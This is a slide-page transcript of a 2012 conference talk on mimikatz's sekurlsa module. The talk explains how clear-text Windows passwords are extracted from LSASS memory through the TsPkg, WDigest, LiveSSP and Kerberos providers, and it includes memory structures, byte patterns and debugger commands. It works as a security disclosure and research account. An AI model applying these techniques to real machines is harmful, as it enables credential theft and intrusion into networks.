Benjamin DELPY `gentilkiwi` focus on sekurlsa / pass-the-pass

Slides:



Advertisements
Similar presentations
MFA for Business Banking – Security Code Multifactor Authentication: Quick Tip Sheets Note to Financial Institutions: We are providing these QT sheets.
Advertisements

With Folder HelpDesk for Outlook, support centres and other helpdesks can work efficiently with support cases inside Microsoft Outlook. The support tickets.
UAG Authentication and Authorization- part1
©2006 Microsoft Corporation. All rights reserved. Windows Vista Security Tidbits Steve Riley Senior Security Strategist Microsoft Corporation
Cross Platform Single Sign On using client certificates Emmanuel Ormancey, Alberto Pace Internet Services group CERN, Information Technology department.
Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.
Module 20 Troubleshooting Common SQL Server 2008 R2 Administrative Issues.
Pass-The-Hash: Gaining Root Access to Your Network
CSI 400/500 Operating Systems Spring 2009 Lecture #20 – Security Measures Wednesday, April 29 th.
(Remote Access Security) AAA. 2 Authentication User named "flannery" dials into an access server that is configured with CHAP. The access server will.
Exposing the Secrets of Windows Credential Provider Presented By: Subrat Sarkar Give me your password.
Internet Information Server 6.0. Overview  What’s New in IIS 6.0?  Built-in Accounts and IIS 6.0  IIS Pass-Through Authentication  Securing Web Traffic.
MS systems use one of the following: LanManager Hash (LM) LanManager Hash (LM) NT LanManager (NTLM) NT LanManager (NTLM) Cached passwords Cached passwords.
Ins and Outs of Authenticating Users Requests to IIS 6.0 and ASP.NET Chris Adams Program Manager IIS Product Unit Microsoft Corporation.
Understanding Integrated Authentication in IIS Chris Adams IIS Supportability Lead Microsoft Corp.
Slide Master Layout Useful for revisions and projector test  First-level bullet  Second levels  Third level  Fourth level  Fifth level  Drop body.
WARNING! Sample chapter -Materials in this sample chapter is selected advanced penetration from
Chapter 4 Windows NT/2000 Overview. NT Concepts  Domains –A group of one or more NT machines that share an authentication database (SAM) –Single sign-on.
Windows This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr. Stephen.
Chapter-4 Windows 2000 Professional Win2K Professional provides a very usable interface and was designed for use in the desktop PC. Microsoft server system.
70-294: MCSE Guide to Microsoft Windows Server 2003 Active Directory Chapter 9: Active Directory Authentication and Security.
September 18, 2002 Introduction to Windows 2000 Server Components Ryan Larson David Greer.
Hands-On Microsoft Windows Server 2008
70-291: MCSE Guide to Managing a Microsoft Windows Server 2003 Network Chapter 7: Domain Name System.
Hands-On Microsoft Windows Server Security Enhancements in Windows Server 2008 Windows Server 2008 was created to emphasize security –Reduced attack.
Week #7 Objectives: Secure Windows 7 Desktop
Chapter 13 Users, Groups Profiles and Policies. Learning Objectives Understand Windows XP Professional user accounts Understand the different types of.
Designing Authentication for a Microsoft Windows 2000 Network Designing Authentication in a Microsoft Windows 2000 Network Designing Kerberos Authentication.
Module 5 Configuring Authentication. Module Overview Lesson 1: Understanding Classic SharePoint Authentication Providers Lesson 2: Understanding Federated.
Kerberos Named after a mythological three-headed dog that guards the underworld of Hades, Kerberos is a network authentication protocol that was designed.
Section 11: Implementing Software Restriction Policies and AppLocker What Is a Software Restriction Policy? Creating a Software Restriction Policy Using.
Guide to MCSE , Second Edition, Enhanced1 The Windows XP Security Model User must logon with: Valid user ID Password User receives access token Access.
G CITRIXHACKIN. Citrix Presentation Server 4.5 New version is called XenApp/Server Common Deployments Nfuse classic CSG – Citrix Secure Gateway Citrix.
Ins and Outs of Authenticating Users Requests to IIS 6.0 and ASP.NET Chris Adams Program Manager IIS Product Unit Microsoft Corporation.
MEMBERSHIP AND IDENTITY Active server pages (ASP.NET) 1 Chapter-4.
SCSC 455 Computer Security Chapter 3 User Security.
mimikatz Benjamin DELPY `gentilkiwi` focus on sekurlsa/pass-the-pass
Active Directory. Computers in organizations Computers are linked together for communication and sharing of resources There is always a need to administer.
Authentication has three means of authentication Verifies user has permission to access network 1.Open authentication : Each WLAN client can be.
Advanced Authentication Campus-Booster ID: Copyright © SUPINFO. All rights reserved Kerberos.
LM/NTLMv1 Retirement Hosted by LSP Services.
By Alva `Skip` DUCKWALL & Benjamin DELPY Abusing Microsoft Kerberos sorry you guys don’t get it.
Windows Active Directory – What is it? Definition - Active Directory is a centralized and standardized system that automates network management of user.
Mimikatz 2.0 Benjamin DELPY `gentilkiwi`. Our little story `whoami`, why am I doing this? mimikatz 2.0 & sekurlsa Focus on Windows 8.1 et 2012r2 Kerberos.
Samba4. What is Samba4? ● A replacement for Active Directory ● The centre of a windows domain: – Windows domain logon server – Windows-compatible LDAP.
Working with Windows 7 at CERN
Tonga Institute of Higher Education IT 141: Information Systems
SQL Server Security & Intrusion Prevention
Development Environment
# 66.
SECTION 1: Add-ons to PowerPoint
Chapter One: Mastering the Basics of Security
Configuring Windows Firewall with Advanced Security
Data Virtualization Tutorial… OAuth Example using Google Sheets
Radius, LDAP, Radius used in Authenticating Users
Fun with Reporting Services Tools
Installation & User Guide
Multi-Factor Authentication (MFA)
Benjamin DELPY `gentilkiwi`
SharePoint-Hosted Apps and JavaScript
Unit 8 NT1330 Client-Server Networking II Date: 8/2/2016
Operation System Program 4
Tonga Institute of Higher Education IT 141: Information Systems
Introduction to school IT systems
Installation & User Guide
Tonga Institute of Higher Education IT 141: Information Systems
HACKIN G CITRIX.
Contacting CT Support with MS Lync Chat room
Getting Started With LastPass Enterprise
Presentation transcript:

Benjamin DELPY `gentilkiwi` focus on sekurlsa / pass-the-pass mimikatz Benjamin DELPY `gentilkiwi` focus on sekurlsa / pass-the-pass

Who ? Why ? Benjamin DELPY `gentilkiwi` Started to code mimikatz to : French 26y Kiwi addict Lazy programmer Started to code mimikatz to : explain security concepts ; improve my knowledge ; prove to Microsoft that sometimes they must change old habits. Why all in French ? because I’m  It limits script kiddies usage. 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz working On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8 x86 & x64 partial support for 8 & Server 8 (few kernel driver bugs ;)) 2000 support dropped with mimikatz 1.0 Everywhere ; it’s statically compiled Two modes direct action (local commands) – process or driver communication mimikatz.exe KeyIso « Isolation de clé CNG » LSASS.EXE Direct action : crypto::patchcng mimikatz.exe SamSS «  Gestionnaire de comptes de sécurité » LSASS.EXE VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...   sekurlsa.dll EventLog « Journal d’événements Windows » SVCHOST.EXE Direct action : divers::eventdrop Open a pipe Write a welcome message Wait commands… and return results 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz architecture all in VC/C++ 2010 with some ASM… mod_crypto mod_pipe mod_inject mod_memory mod_parseur mod_patch mod_hive mod_secacl mod_privilege mod_process mod_service mod_system mod_thread mod_ts mod_text mod_mimikatz_nogpo mod_mimikatz_crypto mod_mimikatz_divers mod_mimikatz_winmine mod_mimikatz_impersonate mod_mimikatz_inject mod_mimikatz_samdump mod_mimikatz_standard mod_mimikatz_handle mod_mimikatz_system mod_mimikatz_service mod_mimikatz_process mod_mimikatz_thread mod_mimikatz_terminalserver mod_mimikatz_privilege mimikatz.exe KiwiCmd.exe KiwiRegedit.exe KiwiTaskmgr.exe kappfree.dll kelloworld.dll klock.dll sekurlsa.dll sam secrets msv_1_0 wdigest livessp kerberos tspkg mimikatz.sys 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa what is it ? My favorite library ! A thread that waits, in LSASS, commands from mimikatz (or mubix meterpreter) What sekurlsa can do from the inside ? Dump system secrets Dump SAM / DC base Dump clear text passwords/hashes from interactive sessions MSV1_0 (dump/inject/delete) TsPkg WDigest LiveSSP Kerberos Let’s start an injection & pass the hash ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa history of « pass-the-* » 1/2 Pass-the-hash 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN) 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity) 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and provide some downloads of it  2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity) 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;)) 2007 was the year of pass the hash ! Pass-the-ticket 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity) 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa history of « pass-the-* » 2/2 Pass-the-pass 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3) http://blog.gentilkiwi.com/securite/pass-the-pass 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;)) http://blog.gentilkiwi.com/securite/re-pass-the-pass 05/2011 – Some organizations opened cases to Microsoft about it… …Lots of time… begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extract… http://seclists.org/pen-test/2012/Mar/7 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory http://blog.gentilkiwi.com/securite/rere-pass-the-pass 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory http://blog.gentilkiwi.com/securite/rerere-pass-the-pass 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa let’s take a moment… You noticed ? It has been one year since Microsoft has been notified about passwords extraction from LSASS Without any reaction… But blacklisting mimikatz from MSE and FEP at 20120228 ;) 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg because sometimes hash is not enough… 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg what is it ? Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop users’s experience http://technet.microsoft.com/library/cc772108.aspx Rely on CredSSP with Credentials Delegation (!= Account delegation) Specs : http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf First impression : it seems cool  User does not have to type its password Password is not in RDP file Password is not in user secrets 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg demo time ! Explanations follow… Démonstration de SSO sur Terminal Server 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg questions ? KB says that for it works, we must enable « Default credentials » delegation “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx What ? Our User/Domain/{Password | Hash | Ticket} ? It seems … In all cases, system seems to be vulnerable to pass-the-*… In what form ? Our specs : [MS-CSSP] 2.2.1.2.1 TSPasswordCreds The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN) TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password [2] OCTET STRING } Challenge / response for authentication ? Serveur : YES (TLS / Kerberos) Client : NO ; *password* is sent to server… So password resides somewhere in memory ? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg symbols & theory Let’s explore some symbols ! sounds cool… (thanks Microsoft) Let’s imagine a scenario Enumerate all sessions to obtain informations : Username Domain LUID Call tspkg!TSCredTableLocateDefaultCreds with LUID to obtain : TS_CREDENTIAL Call tspkg!TSObtainClearCreds with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for : TS_PRIMARY_CREDENTIAL with clear text credentials… kd> x tspkg!*clear* 75016d1c tspkg!TSObtainClearCreds = <no type information> kd> x tspkg!*password* 75011b68 tspkg!TSDuplicatePassword = <no type information> 75011cd4 tspkg!TSHidePassword = <no type information> 750195ee tspkg!TSRevealPassword = <no type information> 75012fbd tspkg!TSUpdateCredentialsPassword = <no type information> kd> x tspkg!*locate* 7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information> 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg test & data LsaEnumerateLogonSessions for each LUID tspkg!TSCredTableLocateDefaultCreds tspkg!TSObtainClearCreds password in clear ? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg test & structures LsaEnumerateLogonSessions lazy way for each LUID tspkg!TSCredTableLocateDefaultCreds typedef struct _KIWI_TS_CREDENTIAL { #ifdef _M_X64 BYTE unk0[0x88]; #elif defined _M_IX86 BYTE unk0[0x50]; #endif PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; KIWI_TS_CREDENTIAL KIWI_TS_PRIMARY_CREDENTIAL typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { PVOID unk0; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Password; } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; tspkg!TSObtainClearCreds KIWI_TS_PRIMARY_CREDENTIAL password in clear ? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg first result It worked ! Since old Windows’s version I hadn’t seen my Windows password I’ve been a little bit afraid After many hesitations, I published a post and a stable tool update on my blog at 20110508 http://blog.gentilkiwi.com/securite/pass-the-pass But some issues : tspkg!TSCredTableLocateDefaultCreds & tspkg!TSObtainClearCreds are not exported tspkg!TSObtainClearCreds not always present… Calling conventions can be a problem Only NT6 and few XP SP3 (manual provider activation) 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg final implementation LsaEnumerateLogonSessions typedef struct _KIWI_TS_CREDENTIAL_AVL_SEARCH { #ifdef _M_X64 BYTE unk0[108]; #elif defined _M_IX86 BYTE unk0[64]; #endif LUID LocallyUniqueIdentifier; BYTE unk1[46]; BYTE unk1[16]; } KIWI_TS_CREDENTIAL_AVL_SEARCH, *PKIWI_TS_CREDENTIAL_AVL_SEARCH; for each LUID tspkg!TSGlobalCredTable KIWI_TS_CREDENTIAL_AVL_SEARCH RtlLookupElementGenericTableAvl typedef struct _KIWI_TS_CREDENTIAL { #ifdef _M_X64 BYTE unk0[0x88]; #elif defined _M_IX86 BYTE unk0[0x50]; #endif PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; KIWI_TS_CREDENTIAL KIWI_TS_PRIMARY_CREDENTIAL LsaUnprotectMemory typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { PVOID unk0; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Password; } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; password in clear ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg demo time ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: tspkg final result It works better ;) No orphan referenced credentials More logic approach (We will see that latter…) We have just to find : tspkg!TSGlobalCredTable SeckPkgFunctionTable->LsaUnprotectMemory LSA_SECPKG_FUNCTION_TABLE : http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx LsaUnprotectMemory : http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx Find this… We all have personal convictions to search unexported data : Hardcoded addresses / offsets (  ) ; Disassembly engine ; Pattern matching ; … 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest because clear text password over http/https is not cool 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest what is it ? “Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]” Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication “Common Digest Authentication Scenarios : Authenticated client access to a Web site Authenticated client access using SASL Authenticated client access with integrity protection to a directory service using LDAP” Microsoft : http://technet.microsoft.com/library/cc778868.aspx Again, it seems cool  No password over the network, just hashes No reversible password in Active Directory ; hashes for each realm Only with Advanced Digest authentication 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest what is it ? We speak about hashes, but what hashes ? H = MD5(HA1:nonce:[…]:HA2) HA1 = MD5(username:realm:password) HA2 = MD5(method:digestURI:[…]) Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon WDigest provider must have elements to compute responses for different servers : Username Realm (from server) Password 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest theory This time, we know : that WDigest keeps password in memory « by protocol » for HA1 digest that LSASS love to unprotect password with LsaUnprotectMemory (so protect with LsaProtectMemory) LsaUnprotectMemory At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE Let’s perform a research in WDigest : Hypothesis seems verified  LsaProtectMemory At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE SpAcceptCredentials takes clear password in args Protect it with LsaProtectMemory Update or insert data in double linked list : wdigest!l_LogSessList .text:7409D151 _DigestCalcHA1@8 call dword ptr [eax+0B4h] .text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h] 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest test & data LsaEnumerateLogonSessions for each LUID wdigest!l_LogSessList search linked list for LUID LsaUnprotectMemory password in clear ? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest final implementation LsaEnumerateLogonSessions for each LUID typedef struct _KIWI_WDIGEST_LIST_ENTRY { struct _KIWI_WDIGEST_LIST_ENTRY *Flink; struct _KIWI_WDIGEST_LIST_ENTRY *Blink; DWORD UsageCount; struct _KIWI_WDIGEST_LIST_ENTRY *This; LUID LocallyUniqueIdentifier; […] LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY; wdigest!l_LogSessList search linked list for LUID KIWI_WDIGEST_LIST_ENTRY LsaUnprotectMemory password in clear ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest demo time ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: wdigest result It works again ! This time we just have to find : wdigest!l_LogSessList SeckPkgFunctionTable->LsaUnprotectMemory LSA_SECPKG_FUNCTION_TABLE : http://msdn.microsoft.com/library/windows/desktop/aa378510.aspx LsaUnprotectMemory : http://msdn.microsoft.com/library/windows/desktop/ff714510.aspx Seems generalizable ? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa and now what ? In fact, with TsPkg and WDigest, passwords can be retrieved from any version of Windows ... WDigest XP, 2003 Vista / Seven / 2008 / 2008r2 8 But not with a Live account  TsPkg XP SP3 (manual install) Even with a Live account  9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa and now what ? wce had not copied my TsPkg functionalities Only WDigest, so they missed 8 Live accounts… Kiwi WDigest patterns (last public release) wce patterns Between ~17 occurrences of wdigest!l_LogSessList, maybe a coincidence… for lack of TsPkg, they can be inspired by next releases ? #ifdef _M_X64 BYTE ptrInsertInLogSess[] = {0x4C, 0x89, 0x1B, 0x48, 0x89, 0x43, 0x08, 0x49, 0x89, 0x5B, 0x08, 0x48, 0x8D}; #elif defined _M_IX86 BYTE ptrInsertInLogSess[] = {0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04}; #endif 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: livessp because Microsoft was too good in closed networks 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: livessp how ? Actually I’ve only used logical (empirical) approach to search passwords… : Protocol reading Symbols searching ~ Boring ~… be more brutal this time : make a WinDBG trap ! 0: kd> !process 0 0 lsass.exe PROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4 DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible> Image: lsass.exe 0: kd> .process /i 83569040 You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context. 0: kd> g Break instruction exception - code 80000003 (first chance) nt!RtlpBreakWithStatusInstruction: 814b39d0 cc int 3 0: kd> .reload /user Loading User Symbols ............................................................ 0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g" 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: livessp how ? Let’s login with a Live account on Windows 8 ! After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest) lsasrv!LsaProtectMemory livessp!LiveMakeSupplementalCred livessp!LiveMakeSecPkgCredentials livessp!LsaApLogonUserEx2 livessp!SpiLogonUserEx2 msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials tspkg!TSHidePassword tspkg!SpAcceptCredentials Our LiveSSP provider Yeah, Pass the Hash capability with Live account too… Live user can logon through RDP via SSO 1: kd> uf /c livessp!LsaApLogonUserEx2 livessp!LsaApLogonUserEx2 (74781536) [...] livessp!LsaApLogonUserEx2+0x560 (74781a96): call to livessp!LiveCreateLogonSession (74784867) 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: livessp final implementation LsaEnumerateLogonSessions typedef struct _KIWI_LIVESSP_LIST_ENTRY { struct _KIWI_LIVESSP_LIST_ENTRY *Flink; struct _KIWI_LIVESSP_LIST_ENTRY *Blink; PVOID unk0; PVOID unk1; PVOID unk2; PVOID unk3; DWORD unk4; DWORD unk5; PVOID unk6; LUID LocallyUniqueIdentifier; LSA_UNICODE_STRING UserName; PVOID unk7; PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; for each LUID livessp!LiveGlobalLogonSessionList search linked list for LUID KIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIMARY_CREDENTIAL typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL { DWORD isSupp; DWORD unk0; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; LsaUnprotectMemory password in clear ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: livessp demo time ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa it was a cool trap no ? Even if we already have tools for normal accounts, are you not curious to test one with this trap ?* * Me, yes 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: kerberos Let’s login normal account After credentials protection, KerbCreateLogonSession calls : NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList lsasrv!LsaProtectMemory kerberos!KerbHideKey kerberos!KerbCreatePrimaryCredentials kerberos!KerbCreateLogonSession kerberos!SpAcceptCredentials kerberos!KerbHidePassword msv1_0!NlpAddPrimaryCredential msv1_0!SspAcceptCredentials msv1_0!SpAcceptCredentials wdigest!SpAcceptCredentials tspkg!TSHidePassword tspkg!SpAcceptCredentials Kerberos, ticket part ? Maybe ;) Kerberos part for password ?????? 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: kerberos (nt 6) final implementation LsaEnumerateLogonSessions typedef struct _KIWI_KERBEROS_LOGON_AVL_SEARCH { #ifdef _M_X64 BYTE unk0[64]; #elif defined _M_IX86 BYTE unk0[36]; #endif LUID LocallyUniqueIdentifier; } KIWI_KERBEROS_LOGON_AVL_SEARCH, *PKIWI_KERBEROS_LOGON_AVL_SEARCH; for each LUID Kerberos!KerbGlobalLogonSessionTable KIWI_KERBEROS_LOGON_AVL_SEARCH typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL { DWORD unk0; PVOID unk1; PVOID unk2; #ifdef _M_X64 BYTE unk3[96]; #elif defined _M_IX86 BYTE unk3[68]; #endif LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; RtlLookupElementGenericTableAvl KIWI_KERBEROS_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: kerberos (nt 5) final implementation LsaEnumerateLogonSessions typedef struct _KIWI_KERBEROS_LOGON_SESSION { struct _KIWI_KERBEROS_LOGON_SESSION *Flink; struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount; PVOID unk0; PVOID unk1; PVOID unk2; DWORD unk3; DWORD unk4; PVOID unk5; PVOID unk6; PVOID unk7; LUID LocallyUniqueIdentifier; #ifdef _M_IX86 DWORD unk8; #endif DWORD unk9; DWORD unk10; PVOID unk11; DWORD unk12; DWORD unk13; PVOID unk14; PVOID unk15; PVOID unk16; […] LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING Domaine; LSA_UNICODE_STRING Password; } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; for each LUID kerberos!KerbLogonSessionList search linked list for LUID KIWI_LIVESSP_PRIMARY_CREDENTIAL LsaUnprotectMemory password in clear ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: kerberos demo time ! 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: kerberos « hu ? » Ok It works…* But why ? *Not at all logon on NT5 *Can need an unlock… From my understanding of Microsoft explanations, no need of passwords for the Kerberos protocol… all is based on the hash (not very sexy too) 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz :: sekurlsa :: kerberos BONUS « hu ? » Microsoft’s implementation of Kerberos is full of logical… For password auth : password hash for shared secret, but keeping password in memory For full smartcard auth : No password on client No hash on client ? NTLM hash on client… KDC sent it back as a gift 9/19/2018 Benjamin DELPY `gentilkiwi` @ PHDays 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

